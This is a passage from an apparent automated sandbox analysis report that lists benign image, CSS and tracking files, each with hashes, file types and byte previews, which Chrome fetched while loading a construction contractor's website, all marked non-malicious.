                                              SHA1:C359986C19EAAC25D577BAE706CFC91CD7D9F596
                                              SHA-256:054A598D673127DD7286DD1E0BB8BDBC8CD1301728E769ECACF4AB5BE42154E9
                                              SHA-512:B61AF26F95D6EB58108ED004DE05EA157C7A2137BB41DC0515F93A4F5819A09976654D5E65CD9631451D1564972255766C87FBFC77777DB89D632ACF88A3495A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISLAlAx0sJOxPglxIFDZRU-s8SBQ2DqFs9EgUNU_J1YRIFDcZosPwSBQ27K6_iEhAJ9H4-RXLhuD8SBQ14bxIZEhAJnaSLcH68-IwSBQ27V1Zq?alt=proto
                                              Preview:CjkKCw2UVPrPGgQIBxgBCgsNg6hbPRoECAkYAQoLDVPydWEaBAgNGAEKBw3GaLD8GgAKBw27K6/iGgAKCQoHDXhvEhkaAAoJCgcNu1dWahoA
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):3429
                                              Entropy (8bit):7.9008187670194205
                                              Encrypted:false
                                              SSDEEP:48:u/6DocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODdPlSw1lHK:uSDZ/I09Da01l+gmkyTt6Hk8nThlfgH
                                              MD5:A1DD359517B8BB2262F12C2674385898
                                              SHA1:28DCE6C0589ABB0A13AB9B6EE4B47EE17DBC85DA
                                              SHA-256:7BF65445CFB18EC423EACB8ED920F41126178515E22D00D7C8FF249CB1144D13
                                              SHA-512:943BC6124DC8B8705E7C1FF1E151F5DCDABD5F044819A0B2AB449BF72AE427CD18D4560D483271CE561C355013BAD2BB8EBD0F450A44ECC07EE7BDCE2B0E3A66
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............l;....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:downloaded
                                              Size (bytes):98044
                                              Entropy (8bit):7.98450953192217
                                              Encrypted:false
                                              SSDEEP:1536:O7QvWFkiVGneq4fZqtHvAKZt+gH3B6te8gy9/zCDqBA:O7QvWFkcG9PtSe8g0eOBA
                                              MD5:25BB573BE1481F75562E776BF958B4E4
                                              SHA1:8B75D9382E7FBDC443BFEB144D7C922365606F4B
                                              SHA-256:7B6006FE6DA825CC43015DA04E6BD90A9ECA6FD614662783FA0092E950D670CA
                                              SHA-512:E620558AA897859254244F82E20A1C9D9F242F790BEA0CDC20A2B175E01F9B06538F6A2B51E1B9C6460819E2D73F5624CBADCA75B5848FF87096EE5F4E88009B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/news/3/3ab20c2822ba796ca4c90a82eae00b78.jpg
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."...................................................$.&I&I$.t.I$.I't.....4N9.}..x.....I..I'N.9;.):I.:[..L.'t..(..d.$..I.I$.I&I;..9'II...K...E.U..fL.$.I.$.;.d.d.'E.v,.L.'wN....I3$.&I$.L.:..N.$.:I<.{...{z..y.^...ft.t..v')\.2d.<.R.$..t.......$..&L.I.:gI.I:L..I....{.6lO...M\..$.N.:w.L..d.$.....'N...."......d.$.$.$.I$.2t.t.I$.s......M.g..:N..7A..W.RI......$.$...?^Y.....3'B...$.$.gI"d.I$.Jj.+6b..@.,.N.$N..$B..$.=L..".wD.:}...mG..L..gI3.t.N.I:I.I$.$.S33$..wH...vL.$..[i$.t..D.G..KZ.2d.&I;.vI;...2I3'I'N..&I..I$.r.nA.V..z.!L.$.6..d.wN....!qt. .d.2B..d.t..8..t.d.I$..L..I.k...=,..1...R...6d.L...D.wwNP924.33$p.2N.I'LV=.qx9..k..I.I'wI.I.I:V".>....tA.z\.}M.2y..M..l.3...N.HS....;3&I$.$.:..f.i..Tw..Y..$.w6t.$.;..$..A..X...O.5.u9:"B.+.cI$I..4..cw...f..$.N....#Cb.....qfL.9..HRN......P.....D...'..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3145
                                              Entropy (8bit):7.925316456377014
                                              Encrypted:false
                                              SSDEEP:96:4Afa5bhkTuD3rrmRrZW409xVi2N7qWyKxYjm:LfWlktxdDW7DyKxYjm
                                              MD5:26866A05C5626AC567A779EADA150EDC
                                              SHA1:09D3927B905393A4EB3B2A3BEFFF3166944F4B57
                                              SHA-256:D1BA80222B0F97FBD7C52DC7DA0726DC2310901CAB9B6677D24A41E5A1C964FF
                                              SHA-512:2ECAE5E9A247F44714F2CD849820B5531C4685293079D0EF2828FB71A9624AF5D89DDA16253E688625D417FCE8C709B2891795FFB2D800D4B6C9E5367B95E0A4
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...cPLTE.....<...\.9.....M.....F`.>..E..E..Q..9......_.G].5{.A..`..C....n..........~.........~.hm.O..X.....IDATh.Y.v.8....#qC......&v....lff.....V.<y.,).dY[.^.f......?....~2kq..S......fpY<<.....8...J...1...,..0..O@..Oi.d...PK...c?..........6..qj.&YJz-m..(..d]..d.....|.|3z.].G(...}....M.M.M....I.'......I?....62...1.V G..u.......k[..Tub.iR......X.&.... ..5..g.b..,.ueF[t..e....G...oY.Z)]..D.6..;a.d..q......%C.-. @..,..[t8.G.%..S..E.I.a.EF..k....b.o...B.t.L...C....h......|?6..}:[ ._b.BL.....d.....F.u3.2..<..(....`H.....KZ....F..J.3H9..)&.r...D'x.Q.4.:;..;x...IC.A...JJ.v..Ok..a_.!NvVD......v..+.K|*|....90.....x.H....... ......4^+u.)/ .;P,l.N.....t.....<.#....&......|... CP.l..m.4M ......r:...1..s`..xTF...(....T@')+.RJy.r.....}...........B.JX`..............T...f.....c.".B!.e..u..u8.....mF.....}@...T..Jj....]..a.......X....O..=.#...M...&&..r8?pY..].X......7....f.........p<NY.gI..'l;!.%\..+s.a.Q.).......a..}.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):6481
                                              Entropy (8bit):7.952588965554541
                                              Encrypted:false
                                              SSDEEP:192:k0268DNqK0Z1w4m8VJxW6ACu7ndHAWfmymf:k09GqV1w2J468ffmy2
                                              MD5:8F16A4934E562FB8E3CA09315BC37FB6
                                              SHA1:62949BE24191D38D435C2AACC6CDFA83F272DBB9
                                              SHA-256:7DFC1F69BF07DF3B098494BA2B24611914928CDEFB8D08597121860829718C62
                                              SHA-512:95853BD11C788C8B0D57A65EB1ABF3C0788F96EFF1A5B309C382D049FBB211ED1D9E581D3C48F75D497EF2F0546454E971389CAA7F7F5375C7DDAFCA196607F4
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...aPLTE...........U...................99............................-9...................63.........................Ic.'3.F].6E..C....AX....1?....N......>...........J...............................8.;N............G..P.+/.DW........*....O........z...;6..P..........P...........>J.K.............T...J..E../....O..E....b.....N..Su.......Ikw....................^..M......................l..z....Qln..........D....;]j`......n..H. ........w|*Ve.....z......1......a.._...s..V........1...X...(....:..J.PO....}...l..?J...K.o....?._f.{......?..........._.....L.J.......(......."-3..S.......Gp...."....IDATh...k*Y..RU.....,..h...V.e...X.>Tf........A..Fhpeo..M.d..N.&?&.2......j.-..IOr..,r?u..~..\....r)...U...K."..M.........|7._.....f0.H..q.o~.d....e..zO(..$..I...:/uG7.9??8....r....z6{...v0. .S..1M.......B..5?6U...........@....G..]......L.....x.VA..$`sx.....x...._w.PHF7.....eV....,..UF.y..0..8.<.N...r........[......}...+.'.4....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):14590
                                              Entropy (8bit):7.686980152511969
                                              Encrypted:false
                                              SSDEEP:384:4YNg7wNkFzEYb2KG86C48z9VH4+rqCuc/:4Yy8NYKCVHtxuc/
                                              MD5:BD8D46206A8C844E51290370A7494BD7
                                              SHA1:E045D32ACE1A91964F25EB0CB48EFC637253EA4D
                                              SHA-256:5081776D65F06B80E429D42745D58E63B5F6869FAE8D8729BFBE278523000333
                                              SHA-512:10DF4098F4B898BD81BA8F5851A702B2D616C4469662DD66A39EB71CAB15A684F6A301BBC853897146F571B1FC1F0D30842F7D541CC533CBEC0846542D1CDE8C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/52/ab92689e9b98ee9d0ef4ca5ced9b328b.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6830
                                              Entropy (8bit):7.953152234593612
                                              Encrypted:false
                                              SSDEEP:192:gSp2AeV0Xo9B0y0rZytuUro6qa5bPfb2P:ZpBeVfvxGauUrrqa5OP
                                              MD5:8889543E618F127B9DA1B6959E491D10
                                              SHA1:821BDA76B10F983D8AC74F05149BC2215E752F89
                                              SHA-256:F4475BA47A4558516AAE5E13B2DF8B81438D4174AC3BDE2766E229FB228BD61C
                                              SHA-512:AEC58E3E0FA1CFA0B0EDE466E79E2F87B3FCCE4CFF4BC9E150F297716FA553C5D54C202DA1D9D74A66FBF18C27D6A1D2CE483A00CA4953ACB471D9FC506E9D81
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/stethoscope.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE....AZ.....X..........@U..T.CU..Q..P.BN.....T.=Q..V.?S.@a..K.FZ.7L..R..\.CV......3,V),[.<Z..M*,S...4*`.AL.E[79b.GQ.....J........V.8T..Q.......Ef;7kFG.HE{......'1b .V..^..Z7H}.5^.>E........E/2h...@Cp7)J.;\1;q..S...Y0T....FL..I.:L.....Z...I4k..E.EZ.....SH,L.....R..M('J.-M....Bc.Dd....1_9K..Z.p4W.....M....#h.%[...#@e...~-W.Mig"V.Ec.8X.p..SA~.DZ.Yv.BbF5\.X.WGq....9\...@e.,U...(8X.Bj.;u....>r.;X..#c.7q.v......O.|...].....sCncf..u...Y.Kz.........N.......].............IDATh...S.h.........nhJ$.!.)...@.p.. ..G.#X.v.d.[.:e..X.VO...N......VY.'.3..O......a...#1...L.b.I.1L&V...I*.....I..^(&..Ij$....0..?......hA.0o...F............&.W...QU.h....#.....B...B...+.^..hz......Z-.3$F..uL.1...."bd$fp....OhQ..F.........1.f.{x.B..b!.a.8]HSiEQ.ZYUU.`..f....|....3..M~....N75.bf.....gB1U.G.....v.u|b.BCG.&v6.p..l.d4. ..+.4.P...dj..{...>.ej ...B.m.6U.T....H.,}v.....n..L.xG.|...."..z......5V..3R7N..m.#2eM.K..h.0MI:....?........&...$.ZA....8;..XTC!
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):13
                                              Entropy (8bit):2.7773627950641693
                                              Encrypted:false
                                              SSDEEP:3:qVZPV:qzd
                                              MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                              SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                              SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                              SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                              Malicious:false
                                              Reputation:low
                                              URL:https://td.doubleclick.net/td/ga/rul?tid=G-0KG8DMQFJJ&gacid=170381380.1727418093&gtm=45je49p0v889720200za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101747727&z=1120686961
                                              Preview:<html></html>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):64982
                                              Entropy (8bit):7.996470828693687
                                              Encrypted:true
                                              SSDEEP:1536:4UISOseBOHWZWy3WkQDG8x1SdKUEyDuAg7UsMm241:nIjSRy3Wk9sS+h2w
                                              MD5:AE0213133370A1C2A436C4CBCE385B6C
                                              SHA1:F021C2080E52C6350D2BE66586BC3E4B9D8E73B7
                                              SHA-256:3E2F16947C0B155A83CDE9ECF72F9E6783D1BA0FD7C73896F5A76CDB8A0311E4
                                              SHA-512:C912FF17C210AE848EAB5BA1E79FB1E8ABB8BEEEF13B465D2A08148D272BC6D907538208F7C5A3276096F9C7EA6FC0BB1D410785DF9E517F2FFEE234751D23A8
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 Z....s...*....>.n.R.&)..6*qp..enP..O.....<..f.....././8Dq..*.._._S.g..Q..z9..|WO...h...F.o8=..o.5........c./...y.....g..[..?.z..c.t?..........O.....o.....z`/.<........;[....A..?}z..Wv...;........P?..U|H.A..'...w.?........u.....11.i....&..<....&.*....u.._..\.....e.lL5.:~.9!..Z'q...J-.2.....K..[^7....=kA%}....&.I.aQ,......[.RK. .CsR...._..h...%r.E.*..N.=.@y[.L.l..&o..#\.orXd....d....TqW...?<g...)0Il.\...3.....+.f...........@.'Q..c}.l,V{&!.^..../9*...q..BR.~...M..j.r.$.5P.C;q....K.+.Ppq.<c.e.q.3....r;T9...RN.xBD}.4..+N(.\....iW..5..../\G..7..............4..s.PW....+.F..4..Z..{B.8.p.O..5..e.=;...ZB.n&.K...)k.W..C.\.E.#.9...}..<J........?B.......?...SZ....=.VV'.....6.......&}.9'...eUBZ4...w.J9.z.y7..f:iK3W..f....J...F&|ei...\..a}....Sc95.D.k..&+...Z.b..f.....~......]b5.v...kO..0..0...;T.m^vM.6w.#?..W.s.6.F..,p...N.g.&...[.....j...h.....e%...R..b...v....`..,.d'S4/..F...?U;.......'@<+y.. .+..-'.$.;E5j$.-.R.|.c..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):16737
                                              Entropy (8bit):7.726132979630559
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwNADSXzRZXGdXzPv7KupdGJqbNvvRQN6K8mAmLz8MBmiQxWCcGV24T5uG5:4YNg7NAWLXebvlpKIJJK8VmLfkNRDE83
                                              MD5:8120B45EEFA2067378080AA9C90133CA
                                              SHA1:6DE233CBB61BAC1259FF56CAADA66428214E8035
                                              SHA-256:24A4235C9096042FBF5B2C5DB03FCB6DEF4CC5C586111F67A7F4D5D48D62B7CF
                                              SHA-512:63DBAD59753084E543BFCFD97FFAC62B17464B8A6788EFED52B53351ADF2485F4B61DED8B99D9016A77579496D57DC95564D54C59695D7A1A662C096001C24F5
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/37/e42feb680379a5741bf93de86671e0ab.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):14990
                                              Entropy (8bit):7.679955180166905
                                              Encrypted:false
                                              SSDEEP:384:4YNg7r2IKe+DrKCbQwnnX1sGKGQafKkLK:4Yy/mvKCEwnXuZszm
                                              MD5:BEC64E729C731AF035403631057E10FB
                                              SHA1:73814E9A56B0E1FD03A9FAC4E94B15C8CD373ADF
                                              SHA-256:A736F91E40BFA7B2A58829BEBA89539EA88A4BB4FF2D41B5FF7EDEDB4ACCAF48
                                              SHA-512:8DC726FD7C60F2CCB7BAF35E1A5CA0E59DA73B7541118AA5A3846EBA7EAFC435D34C44F788366BDB8CBA65627A8E0637EBDB4E03ED23ED40E0AAAAC3D4605803
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/77/c059f7269e55d15bb3fffd5735cac96b.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 253 x 87, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):19094
                                              Entropy (8bit):7.944191431559707
                                              Encrypted:false
                                              SSDEEP:384:0JXE05ssozf3U/0R7lyGLJKnXyWiRlHLhjhr56G/2GYGItgUyc:w35ssoTk/0R7CF2jJrYGIt7b
                                              MD5:957B517E9EBBCE44D0AB91371883E1DB
                                              SHA1:0CD84A7351FFF71F45AE70876D076BD628C0DF75
                                              SHA-256:164244DA85648DF62F6E4DE4D73BC54A8427C4F63F65F4F7754B58AF8F5E19F1
                                              SHA-512:8FC8C22F0A6148C7D73421C47413ED1F8190E2E9334AA11EF191A8526E9B43039B3A07858C43934F60B403A25A97FD850471CF2990C7815BD5E34DD7C800CDAE
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/images/logo1.png
                                              Preview:.PNG........IHDR.......W......Ct....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):67992
                                              Entropy (8bit):7.996529119202125
                                              Encrypted:true
                                              SSDEEP:1536:xmpYDDaDI+L/GCfLfAnX067hDyWqdwmO76H7HAhO:dW/GCfkXt7heWgO767Aw
                                              MD5:F8E4559C38476C054B09E4415881923F
                                              SHA1:1E8AE023D4174FFDD059DBE5D0FCFFFDF3F7D3F4
                                              SHA-256:A0EE5D025E8B05327943F7E6D4D3E1BCA2DA9460B28755D3995908E0DA3C3E42
                                              SHA-512:F7D9EE905122B2C32574AF9FD9BAB48A72A7FBFE3884EA3FECCA64E140C5A69939D5D26FCB4CC6747424420A28620DAC425F333E2680548F495470A2BA827CF4
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 .....m...*....>.l.R)+3;&4..`..cnP.9u..~...g ..9...k.F.[x...I.hW.=Km....x...n.+k........m<...-...s.o.o..._..?.d.....O.G.w.O._.g.@........W.s...K.......'.....pW....`.I..........b...?[...#_........}..S.....{........~....%.............y..gD....6.>:....:...t....2..K..,..B.....8,...T@a.f..m.@.,.........V.l..v...b=.....cW...I..l....E2j...i>|..@..2.zA..l._................0...-..aA..%B.V.0..m.WI.v.-.%!.+#-K..{7.....P.9?....A{.g.....W|..Z.......:..tq.X..iH...e.D{.wz.dM.....O6H..Gu=.7%......kv.\y.s...U..=.....d.n.gI.......3....f.n0..'+..........`.x21.A....~...u.'.N.....a.a.(..w.......}.K..m.ad.*.x....YK+.......Vh....:.......!.S....).7b..W..-.....c`].=S.y...&u..=tX..S*Iq....w.-.t....G9....`...X.:.D1K.....s...vw......t....P.Z.x.q.|..e(...U.3.."._..y..OK..S.o.}...2\...0.U")...cS;qL....G..{..._..znG.*..Gc..&..A%.&....).aH~V. .6..C..A>..(.>....=F5..;A.F.AE..3..N...7..h..M:4...\.z.a.`...M0t......e..ra.6.mZJ.^.m..CBW.I.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Unicode text, UTF-8 text, with very long lines (1269)
                                              Category:downloaded
                                              Size (bytes):379988
                                              Entropy (8bit):4.9941169581614995
                                              Encrypted:false
                                              SSDEEP:1536:VnnPTWpohj+WWM/IyURIEnXSEc6/YssmTlF0pJ4OaW6Kt04T8if0W8DsEBpy0cu2:VphjkF0pJ4OaW6Kt04J0VUpz600I4fM
                                              MD5:21EAD2AA01FE66027C62E4BBD6C22ABB
                                              SHA1:22620B7B30CDDE376E7B7CFEE4C6D753FD159DB6
                                              SHA-256:C745F5B873067073E20D2A56D3817FA435188B7B15CCA781A12856E7AA72F45B
                                              SHA-512:96F7EB82872980D264B78AC849FBDD7521176EA585CBD0F1EB77CF96E97A5BC3220C2A494DAAD3B1C9F5D486CF399CE3F8E7DFE84F446F9B87B9F032F0757494
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/css/bootstrap.min.css
                                              Preview:@charset "UTF-8";/*!. * Bootstrap v5.1.3 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors. * Copyright 2011-2021 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-rgb:220,53
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):14070
                                              Entropy (8bit):7.9797662873078075
                                              Encrypted:false
                                              SSDEEP:192:SNXiXOr0Rk3+7GhU7cxSnYsBrM7uN0Rqq2Hom1UB03sfLp7zANxgvg7gSkR:seO4RiwGhU7HbBuuXq2Ho/gUt/eC
                                              MD5:75149400BFD5C2048C4988838CE1E36A
                                              SHA1:9C6FA71C851B43D9101E061026D04629B8DEED74
                                              SHA-256:A3B636DDC81013BBD1DE7D5A74707ADF0CBAE3669A8CA96D3E0095C1E7920B23
                                              SHA-512:60C45C786DA4B5B15F27A901BFA9CE9233ADD020D474110528A3ACFC09BCC04B79B16C57EDD8A703D28DAE9F1AFA9AA1342424C77CB4190949FD92650A716978
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21412!3i14013!4i256!2m3!1e0!2sm!3i707457593!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=82046
                                              Preview:RIFF.6..WEBPVP8L.6../..?...6.m..]#.I).... .....=....m..w7\S2.i.^.B,u?..8.mU..~.r `b....;<=...P.b.U(.Q.4....H.%H".B$.B...ch..RTP.B )6.*....2"..I...28..`..{g.O&0....6.2/...5.h!..^....!.OO.f.).W.....?.....g.N.y..U..H.23.G..)...Gz.F.Yyb.......5e....g.L....N.......+/'y^......o....T...Gm..mk..........\......iE/.8ekv..n. c.v.g!......./...%.............~..y..........k..EA...?...W.F...!..1.#O..$...eh..uO#8.3....7.............N,.....b..e.T.._V.vY-I.....u....N?..Q...G.#9,......c5..7D........e..~C..~.o..xKG\.Ym.a.W........P(..m$"...h.|R.F..`L.h.B...:0.&c..~L....5r...7.......G.../5V...q.).8v.O..9|.....3<.?H. k.......F((....3D.j/I.+{.|.j.v...U}......."..J(....G.PO.W.Q...U..O.$..4.>5..+.5..+@.....E...../t......\...S.@.T...9d..O...\...J]..0...f.$..J...{X...}o<.e.w...S.~$*.!....D.K..._..?........'....T%........\..'.F.."....Y...3...X..U.{.......A/...~........7......+.m..{..a^C.x....V..0%}.q."$9J.S.i{..)L=..IbJ.....'.._.......U.<...A...'..U.......W\.....B.x.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):16327
                                              Entropy (8bit):7.971538992036383
                                              Encrypted:false
                                              SSDEEP:384:K0wDGB7pzDVQAHcXE6x0bv1m9XFUN+n4ltmiF8u5AOfHq:KkpzDVQZXEi0r1IFUQ41auQ
                                              MD5:07157F5AA9BBE3EE788BB649BDECC32E
                                              SHA1:274445F8DF8931EFC8CF38182AA9DC7A837FEFF0
